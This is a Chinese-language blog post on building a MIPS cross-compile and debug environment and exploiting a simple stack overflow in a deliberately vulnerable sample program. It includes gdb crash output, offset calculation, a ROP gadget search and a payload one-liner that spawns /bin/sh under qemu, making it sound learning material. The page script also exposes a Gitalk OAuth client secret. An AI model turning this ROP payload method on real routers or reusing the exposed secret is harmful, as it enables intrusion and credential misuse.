<!DOCTYPE html>
<html lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <title>
    mips编译环境配置与简单栈溢出 |
    
    The lair of C0yo7e</title>
  
    <link rel="shortcut icon" href="/images/time.png">
  
  <link rel="stylesheet" href="/css/style.css">
  
    <link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">
  
  <script src="/js/pace.min.js"></script>
</head>
</html>
<body>
<main class="content">
  <section class="outer">
  

<article id="post-mips编译环境配置与简单栈溢出" class="article article-type-post" itemscope itemprop="blogPost" data-scroll-reveal>
  
  <div class="article-inner">
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      mips编译环境配置与简单栈溢出
    </h1>
  
  




      </header>
    

    
      <div class="article-meta">
        <a href="/2020/05/12/mips编译环境配置与简单栈溢出/" class="article-date">
  <time datetime="2020-05-12T10:00:33.000Z" itemprop="datePublished">2020-05-12</time>
</a>
        
      </div>
    

    
      
    <div class="tocbot"></div>





    

    <div class="article-entry" itemprop="articleBody">
      


      

      
        <h2 id="环境编译"><a href="#环境编译" class="headerlink" title="环境编译"></a>环境编译</h2><p>首先就是搭一下编译环境，（==最好选16的ubuntu==，我曾经觉得18的Ubuntu长得好看，然后在上面搭了一天的环境之后发现，并不能动态调试，然后重新在16里又再搭了一天）</p>
<h3 id="buildroot"><a href="#buildroot" class="headerlink" title="buildroot"></a>buildroot</h3><p>下载：<a href="https://buildroot.org/download" target="_blank" rel="noopener">buildroot</a></p>
<p>解压之后，configs里面有一个<code>qemu_mips32r2el_malta_defconfig</code>这样的配置，可以进去找找看有没有，我们回到主目录，直接<code>make qemu_mips32r2el_malta_defconfig</code></p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">coyote@ubuntu:~/buildroot<span class="number">-2020.02</span><span class="number">.1</span>$ make qemu_mips32r2el_malta_defconfig</span><br><span class="line">coyote@ubuntu:~/buildroot<span class="number">-2020.02</span><span class="number">.1</span>$ make</span><br></pre></td></tr></table></figure>

<p>make qemu…那个命令就是配置相对应的环境，就不用手动<code>make menuconfig</code> 去设置了。</p>
<a id="more"></a>
<p>进入menuconfig界面之后选择第一项<code>Target Architecture</code>，改成<code>MIPS（little endian）</code>（默认编译小端程序），另外，选择<code>Toolchain</code>，将<code>Kernel Headers</code>的Linux版本改成自己主机的Linux版本（因为我们编译出的MIPS交叉工具是需要在我们的主机上运行的）</p>
<p>之后make就好了（过程可能会很漫长，耐心等吧<br>编译完成之后，在<code>buildroot/output/host/bin</code><br>下就有<code>mipsel-linux-gcc</code>了，我们就可以通过它编译了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">~/buildroot-2020.02.1/output/host/bin/mipsel-linux-gcc test.c -o test -static</span><br></pre></td></tr></table></figure>

<p>不过这样还是有点麻烦，所以我们可以直接配置环境变量</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">gedit ~/.bashrc</span><br><span class="line">export PATH=$PATH:/home/coyote/buildroot<span class="number">-2020.02</span><span class="number">.1</span>/output/host/usr/bin   <span class="comment">#写入文件</span></span><br><span class="line">source ~/.bashrc</span><br></pre></td></tr></table></figure>

<p>然后我们就可以直接通过命令编译,不用带上路径了</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mipsel-linux-gcc test.c -o test -static</span><br></pre></td></tr></table></figure>

<h3 id="IDA-mipsrop"><a href="#IDA-mipsrop" class="headerlink" title="IDA mipsrop"></a>IDA mipsrop</h3><p>下载 <a href="https://github.com/devttys0/ida/blob/master/plugins/mipsrop/mipsrop.py" target="_blank" rel="noopener">mipsrop.py</a></p>
<p>直接放到plugins下,然后重启就可以在ida的search里面找到<code>mips rop gadgets</code></p>
<p>点击这个之后，可以在idapython框里面输入mipsrop的命令，主要如下</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">mipsrop.stackfinder() <span class="comment"># 寻找栈数据可控的 rop，建立和 a0、a1 寄存器的关系</span></span><br><span class="line">mipsrop.summary() <span class="comment"># 列出所有的可用 rop</span></span><br><span class="line">mipsrop.system() <span class="comment"># 寻找命令执行的的rop</span></span><br><span class="line">mipsrop.find(xxx) <span class="comment"># 查找 find 函数参数的 rop，类似正则匹配</span></span><br></pre></td></tr></table></figure>

<h3 id="mips反编译"><a href="#mips反编译" class="headerlink" title="mips反编译"></a>mips反编译</h3><p>这真是个令人头秃的东西</p>
<p>mips反编译有三个：</p>
<blockquote>
<p>retdec<br>ghidra<br>jeb-mips</p>
</blockquote>
<h4 id="ida-retdec-插件"><a href="#ida-retdec-插件" class="headerlink" title="ida retdec 插件"></a>ida retdec 插件</h4><blockquote>
<p>retdec-idaplugin：<a href="https://github.com/avast/retdec-idaplugin/releases" target="_blank" rel="noopener">https://github.com/avast/retdec-idaplugin/releases</a><br>retdec：<a href="https://github.com/avast/retdec/releases" target="_blank" rel="noopener">https://github.com/avast/retdec/releases</a></p>
</blockquote>
<p>步骤：</p>
<ul>
<li>把idaplugin里面的两个dll放到ida下面的plugins里面</li>
<li>打开ida，在options下面找到 <code>RetDec Plugin Setting...</code></li>
<li>点击去，把下载好的retdec文件下的<code>retdec-decompiler.py</code>（在bin里面）的地址链入<code>RetDec script</code>里面</li>
<li>点 <code>Edit-&gt;plugins-&gt;retargetable decompiler</code>就可以实现反编译出c了（快捷键好像是ctrl+d，不过因机而定的）</li>
</ul>
<p>这个反编译出来的代码真的好丑啊！不知道是不是我的问题，它真的就是c文件，只能从上往下看。<br><img src="/2020/05/12/mips编译环境配置与简单栈溢出/1.png" alt></p>
<p>还不如直接<code>python /path/to/retdec-decompiler.py test</code> 编译出c文件之后在vs里面看，至少还有代码高亮。</p>
<p>如果有大佬的retdec可以反编译得很方便的话就教教我吧！</p>
<h4 id="jeb-mips"><a href="#jeb-mips" class="headerlink" title="jeb-mips"></a>jeb-mips</h4><p>由于实在忍不了retdec的简略，就尝试了jeb-mips</p>
<blockquote>
<p>jeb-mips：<a href="https://www.pnfsoftware.com/jeb/demomips" target="_blank" rel="noopener">https://www.pnfsoftware.com/jeb/demomips</a></p>
</blockquote>
<p>解压之后windows下就直接点<code>jeb_wincon.bat</code>运行（不过不知道是不是我电脑的问题还是java版本的问题，点开之后运行个一分钟就会自动退出）<br>大佬的Mac是可以运行的，我的win挣扎了一个下午也没解决这个问题，最后安在了linux下<br><img src="/2020/05/12/mips编译环境配置与简单栈溢出/2.png" alt></p>
<h4 id="Ghidra"><a href="#Ghidra" class="headerlink" title="Ghidra"></a>Ghidra</h4><p>我不是很熟jeb的操作，data变code我都很迷茫，右键<code>disassemble</code>好像没有作用（这个可能是我的问题，和软件无关）所以我又去找了ghidra下载</p>
<blockquote>
<p>ghidra（要梯子）：<a href="https://ghidra-sre.org/ghidra_9.0.4_PUBLIC_20190516.zip" target="_blank" rel="noopener">https://ghidra-sre.org/ghidra_9.0.4_PUBLIC_20190516.zip</a></p>
</blockquote>
<p>解压之后直接点<code>ghidraRun.bat</code>运行，好像是会新建一个工程，然后在<code>file-&gt;import file</code>选择你想反编译的文件导入工程，文件就会显示在窗口里，如图<br><img src="/2020/05/12/mips编译环境配置与简单栈溢出/4.png" alt></p>
<p>双击文件名就可以打开了</p>
<p>效果如图：<br><img src="/2020/05/12/mips编译环境配置与简单栈溢出/3.png" alt></p>
<p>双击汇编就可以解析成伪c（感觉上代码好冗杂，看起来可能比较费时间），但是它选中汇编代码右键会有很多不同的disassemble模式，比如MIPS、MIPS16el、static等等</p>
<h2 id="mips的指令集特点"><a href="#mips的指令集特点" class="headerlink" title="mips的指令集特点"></a>mips的指令集特点</h2><p>主要的两个概念</p>
<ul>
<li>叶子函数：当前函数不再调用其他函数。</li>
<li>非叶子函数：当前函数调用其他函数。</li>
</ul>
<p>指令特点：</p>
<ul>
<li>固定4字节指令长度。</li>
<li>MIPS默认不把子函数的返回地址存放到栈中，而是存放到$ra寄存器中。</li>
<li>流水线效应。MIPS采用了高度的流水线，最重要的两个效应就是分支延迟效应和载入延迟效应。</li>
<li>没有堆栈直接操作的指令，也就是没有 push 和 pop 指令</li>
</ul>
<p>具体可以参考：</p>
<ul>
<li><a href="https://ray-cp.github.io/archivers/MIPS_Debug_Environment_and_Stack_Overflow#mips-%E6%B1%87%E7%BC%96%E5%9F%BA%E7%A1%80" target="_blank" rel="noopener">mips的汇编基础</a></li>
<li><a href="https://blog.csdn.net/gujing001/article/details/8476685" target="_blank" rel="noopener">mips的指令和用法</a></li>
</ul>
<h2 id="mips的溢出"><a href="#mips的溢出" class="headerlink" title="mips的溢出"></a>mips的溢出</h2><h3 id="rop链"><a href="#rop链" class="headerlink" title="rop链"></a>rop链</h3><p>用了全网都在用的那个例子，也是《揭秘家用路由器0day漏洞挖掘技术》里面的例子</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">do_system_0</span><span class="params">(<span class="keyword">int</span> code,<span class="keyword">char</span> *cmd)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">char</span> buf[<span class="number">255</span>];</span><br><span class="line">    <span class="comment">//sleep(1);</span></span><br><span class="line">    system(cmd);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">char</span> buf[<span class="number">256</span>]=&#123;<span class="number">0</span>&#125;;</span><br><span class="line">    <span class="keyword">char</span> ch;</span><br><span class="line">    <span class="keyword">int</span> count = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">int</span> fileLen = <span class="number">0</span>;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">stat</span> <span class="title">fileData</span>;</span></span><br><span class="line">    FILE *fp;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(<span class="number">0</span> == stat(<span class="string">"passwd"</span>,&amp;fileData))</span><br><span class="line">        fileLen = fileData.st_size;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>((fp = fopen(<span class="string">"passwd"</span>,<span class="string">"rb"</span>)) == <span class="literal">NULL</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">"Cannot open file passwd!n"</span>);</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    ch=fgetc(fp);</span><br><span class="line">    <span class="keyword">while</span>(count &lt;= fileLen)</span><br><span class="line">    &#123;</span><br><span class="line">        buf[count++] = ch;</span><br><span class="line">        ch = fgetc(fp);</span><br><span class="line">    &#125;</span><br><span class="line">    buf[--count] = 'x00';</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(!<span class="built_in">strcmp</span>(buf,<span class="string">"adminpwd"</span>))</span><br><span class="line">    &#123;</span><br><span class="line">        do_system_0(count,<span class="string">"ls -l"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">"you have an invalid password!n"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    fclose(fp);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>编译完之后，丢进ida看看程序是干什么的</p>
<p>会发现程序读入了一个passwd文件，然后passwd不对就会输出”you have an invalid password!n”</p>
<p>我们要利用溢出来绕过这个</p>
<p>所以我们先往passwd里面填充大量字符</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">coyote@ubuntu:~<span class="regexp">/mips_test$ python -c "print 'a'*0x200" &gt; passwd</span></span><br></pre></td></tr></table></figure>

<p>起qemu，然后gdb连接</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#terminal 1</span></span><br><span class="line">coyote@ubuntu:~/mips_test$ qemu-mipsel -g <span class="number">1234</span> ./test  <span class="comment">#-g是开放远程连接，gdb调试，1234是开放的端口</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#terminal 2</span></span><br><span class="line">coyote@ubuntu:~/mips_test$ gdb-multiarch ./test</span><br><span class="line">pwndbg&gt; target remote :<span class="number">1234</span> attach</span><br><span class="line"><span class="comment"># 如果第一次远程调的话，先</span></span><br><span class="line"><span class="comment"># pwndbg&gt;set arch mips</span></span><br><span class="line"><span class="comment"># pwndbg&gt;set endian little</span></span><br></pre></td></tr></table></figure>

<h4 id="gdb的调试分析过程："><a href="#gdb的调试分析过程：" class="headerlink" title="gdb的调试分析过程："></a>gdb的调试分析过程：</h4><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; target remote :<span class="number">1234</span> attach</span><br><span class="line">pwndbg&gt; c</span><br><span class="line">Continuing.</span><br><span class="line"></span><br><span class="line">Program received signal SIGSEGV, Segmentation fault.</span><br><span class="line">0x61616161 in ?? ()</span><br><span class="line">LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA</span><br><span class="line">─────────────────────────────────[ REGISTERS ]──────────────────────────────────</span><br><span class="line"> V0   <span class="number">0x0</span></span><br><span class="line"> V1   <span class="number">0x1</span></span><br><span class="line"> A0   <span class="number">0x1</span></span><br><span class="line"> A1   <span class="number">0x1</span></span><br><span class="line"> A2   <span class="number">0x4b</span></span><br><span class="line"> A3   <span class="number">0x39</span></span><br><span class="line"> T0   <span class="number">0x0</span></span><br><span class="line"> T1   <span class="number">0x2a7f6573</span></span><br><span class="line"> T2   <span class="number">0xffffffff</span></span><br><span class="line"> T3   <span class="number">0x64726f77</span> (<span class="string">'word'</span>)</span><br><span class="line"> T4   <span class="number">0x0</span></span><br><span class="line"> T5   <span class="number">0x0</span></span><br><span class="line"> T6   <span class="number">0x0</span></span><br><span class="line"> T7   <span class="number">0x0</span></span><br><span class="line"> T8   <span class="number">0x1e</span></span><br><span class="line"> T9   <span class="number">0x40479c</span> (__pthread_return_0) ◂— jr     $ra</span><br><span class="line"> S0   <span class="number">0x0</span></span><br><span class="line"> S1   <span class="number">0x410000</span> (__preinit_array_start) ◂— <span class="number">0xffffffff</span></span><br><span class="line"> S2   <span class="number">0x0</span></span><br><span class="line"> S3   <span class="number">0x0</span></span><br><span class="line"> S4   <span class="number">0x0</span></span><br><span class="line"> S5   <span class="number">0x0</span></span><br><span class="line"> S6   <span class="number">0x0</span></span><br><span class="line"> S7   <span class="number">0x0</span></span><br><span class="line"> S8   <span class="number">0x61616161</span> (<span class="string">'aaaa'</span>)</span><br><span class="line"> FP   <span class="number">0x76ffec48</span> ◂— <span class="string">'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n0'</span></span><br><span class="line"> SP   <span class="number">0x76ffec48</span> ◂— <span class="string">'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n0'</span></span><br><span class="line"> PC   <span class="number">0x61616161</span> (<span class="string">'aaaa'</span>)</span><br><span class="line">───────────────────────────────────[ DISASM ]───────────────────────────────────</span><br><span class="line">Invalid address <span class="number">0x61616161</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">───────────────────────────────────[ STACK ]────────────────────────────────────</span><br><span class="line"><span class="number">00</span>:<span class="number">0000</span>│ fp sp  <span class="number">0x76ffec48</span> ◂— <span class="string">'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n0'</span></span><br><span class="line"><span class="meta">... </span>↓</span><br><span class="line">─────────────────────────────────[ BACKTRACE ]──────────────────────────────────</span><br><span class="line"> ► f <span class="number">0</span> <span class="number">61616161</span></span><br><span class="line">────────────────────────────────────────────────────────────────────────────────</span><br></pre></td></tr></table></figure>

<p>通过这里可以看到跳转地址被改为了<code>0x61616161</code>，而存放这个内容的地址是<code>0x76ffec48</code>,所以计算从开始读入passwd文件的位置到跳转地址的字符偏移。</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/<span class="number">40</span>gx <span class="number">0x76ffea00</span></span><br><span class="line"><span class="number">0x76ffea00</span>:	<span class="number">0x00402744004105f4</span>	<span class="number">0x0000000076ffea7c</span></span><br><span class="line"><span class="number">0x76ffea10</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x004011e0004181e0</span></span><br><span class="line"><span class="number">0x76ffea20</span>:	<span class="number">0x004105f800413c80</span>	<span class="number">0x0000000000000002</span></span><br><span class="line"><span class="number">0x76ffea30</span>:	<span class="number">0x0000000000413c80</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x76ffea40</span>:	<span class="number">0x00400a3476ffea78</span>	<span class="number">0x00400ac000000000</span></span><br><span class="line"><span class="number">0x76ffea50</span>:	<span class="number">0x00000000000001b6</span>	<span class="number">0x00000000004181e0</span></span><br><span class="line"><span class="number">0x76ffea60</span>:	<span class="number">0x0041000000000000</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x76ffea70</span>:	<span class="number">0x004006a000000000</span>	<span class="number">0x0040e76a00000000</span></span><br><span class="line"><span class="number">0x76ffea80</span>:	<span class="number">0x0000000000001000</span>	<span class="number">0x00000000004181e0</span></span><br><span class="line"><span class="number">0x76ffea90</span>:	<span class="number">0x00000201000000ff</span>	<span class="number">0x0041490800000201</span></span><br><span class="line"><span class="number">0x76ffeaa0</span>:	<span class="number">0x0041490800414908</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x76ffeab0</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x76ffeac0</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x76ffead0</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x76ffeae0</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x76ffeaf0</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x76ffeb00</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x76ffeb10</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x76ffeb20</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x76ffeb30</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line">pwndbg&gt; distance <span class="number">0x76ffeaa8</span> <span class="number">0x76ffec48</span></span><br><span class="line">0x76ffeaa8-&gt;0x76ffec48 is 0x1a0 bytes (0x68 words)</span><br></pre></td></tr></table></figure>

<p>所以我们要填充<code>&#39;a&#39;*0x19c</code>使得跳转地址没有被覆盖</p>
<p>ida里通过mips rop找到可用的rop</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Python&gt;mipsrop.stackfinder()</span><br><span class="line">----------------------------------------------------------------------------------------------------------------</span><br><span class="line">|  Address     |  Action                                              |  Control Jump                          |</span><br><span class="line">----------------------------------------------------------------------------------------------------------------</span><br><span class="line">|  <span class="number">0x004034A0</span>  |  addiu $a1,$sp,<span class="number">0x58</span>+var_40                           |  jr    <span class="number">0x58</span>+var_4($sp)                 |</span><br><span class="line">----------------------------------------------------------------------------------------------------------------</span><br><span class="line">Found <span class="number">1</span> matching gadgets</span><br></pre></td></tr></table></figure>

<p><code>addiu $a1,$sp,0x58+var_40</code> –&gt; sp+0x18的位置放入参数(即’/bin/sh’)</p>
<blockquote>
<p>0x58+var_40 = 0x58-0x40 = 0x18</p>
</blockquote>
<p><code>jr    0x58+var_4($sp)</code> –&gt; 跳转执行sp+0x54位置的函数</p>
<blockquote>
<p>0x58+var_4($sp) = 0x58 - 0x4 = 0x54</p>
</blockquote>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; p/x $sp+<span class="number">24</span></span><br><span class="line">$<span class="number">2</span> = <span class="number">0x76ffec60</span></span><br><span class="line">pwndbg&gt; distance <span class="number">0x76ffec60</span> <span class="number">0x76ffeaa8</span></span><br><span class="line">0x76ffec60-&gt;0x76ffeaa8 is -0x1b8 bytes (-0x6e words)</span><br></pre></td></tr></table></figure>

<h4 id="思路："><a href="#思路：" class="headerlink" title="思路："></a>思路：</h4><p>其实之前的那个跳转地址就是我们的sp，所以我们再填充0x18个字节之后填入<code>&#39;/bin/sh/x00&#39;</code>作为system的参数，然后再填0x34个字节后，填入<code>do_system</code>的地址</p>
<h4 id="exp："><a href="#exp：" class="headerlink" title="exp："></a>exp：</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">coyote@ubuntu:~/mips_test$ python -c <span class="string">"print 'a'*0x19c + '\xa0\x34\x40\x00' + 0x18*'b' + '/bin/sh\x00' + 'c'*0x34 + '\x70\x03\x40\x00'"</span> &gt; passwd</span><br><span class="line">coyote@ubuntu:~/mips_test$ qemu-mipsel ./test</span><br><span class="line">$ ls</span><br><span class="line">passwd	test  test_1  test.c</span><br></pre></td></tr></table></figure>

<h2 id="参考链接："><a href="#参考链接：" class="headerlink" title="参考链接："></a>参考链接：</h2><ul>
<li><a href="https://www.jianshu.com/p/ba12cd4e530a" target="_blank" rel="noopener">https://www.jianshu.com/p/ba12cd4e530a</a></li>
<li><a href="https://ray-cp.github.io/archivers/MIPS_Debug_Environment_and_Stack_Overflow" target="_blank" rel="noopener">https://ray-cp.github.io/archivers/MIPS_Debug_Environment_and_Stack_Overflow</a></li>
</ul>
<h3 id="书目推荐："><a href="#书目推荐：" class="headerlink" title="书目推荐："></a>书目推荐：</h3><ul>
<li>《揭秘家用路由器0day漏洞挖掘技术》<br>（<a href="https://raw.githubusercontent.com/ray-cp/MIPS/master/book_note/%E6%8F%AD%E7%A7%98%E5%AE%B6%E7%94%A8%E8%B7%AF%E7%94%B1%E5%99%A80day%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98%E6%8A%80%E6%9C%AF.pdf/" target="_blank" rel="noopener">pdf版</a>）</li>
</ul>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://c0yo7e.github.io/2020/05/12/mips编译环境配置与简单栈溢出/" data-id="ckdmyqw30000f0kswtijfobii"
         class="article-share-link">Share</a>
      
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/others/">others</a></li></ul>

    </footer>

  </div>

  
    
  <nav class="article-nav">
    
      <a href="/2020/08/01/IO-FILE-leakaddr/" class="article-nav-link">
        <strong class="article-nav-caption">Newer posts</strong>
        <div class="article-nav-title">
          
            IO_FILE-leakaddr
          
        </div>
      </a>
    
    
      <a href="/2020/03/10/house-of-orange/" class="article-nav-link">
        <strong class="article-nav-caption">Olde posts</strong>
        <div class="article-nav-title">house_of_orange</div>
      </a>
    
  </nav>


  

  
    
  <div class="gitalk" id="gitalk-container"></div>
  <link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
  <script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>
  <script src="https://cdn.bootcss.com/blueimp-md5/2.10.0/js/md5.min.js"></script>
  <script type="text/javascript">
    var gitalk = new Gitalk({
      clientID: '57453e2505e1523b1d78',
      clientSecret: 'c9d2109f4649be7dca5ef5622d85e38608a7cd1e',
      repo: 'content',
      owner: 'C0yo7e',
      admin: ['C0yo7e'],
      // id: location.pathname,      // Ensure uniqueness and length less than 50
      id: md5(location.pathname),
      distractionFreeMode: false,  // Facebook-like distraction free mode
      pagerDirection: 'last'
    })

  gitalk.render('gitalk-container')
  </script>

  

</article>



</section>
  <footer class="footer">
  <div class="outer">
    <div class="float-right">
      <ul class="list-inline">
  
    <li><i class="fe fe-smile-alt"></i> <span id="busuanzi_value_site_uv"></span></li>
  
</ul>
    </div>
    <ul class="list-inline">
      <li>&copy; 2020 The lair of C0yo7e</li>
      <li>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a></li>
      <li>Theme  <a href="https://github.com/zhwangart/hexo-theme-ocean">Ocean</a></li>
    </ul>
  </div>
</footer>

</main>

<aside class="sidebar sidebar-specter">
  
    <button class="navbar-toggle"></button>
<nav class="navbar">
  
    <div class="logo">
      <a href="/"><img src="/images/time.png" alt="The lair of C0yo7e"></a>
    </div>
  
  <ul class="nav nav-main">
    
      <li class="nav-item">
        <a class="nav-item-link" href="/">Home</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/archives">Archives</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/about">About</a>
      </li>
    
    <li class="nav-item">
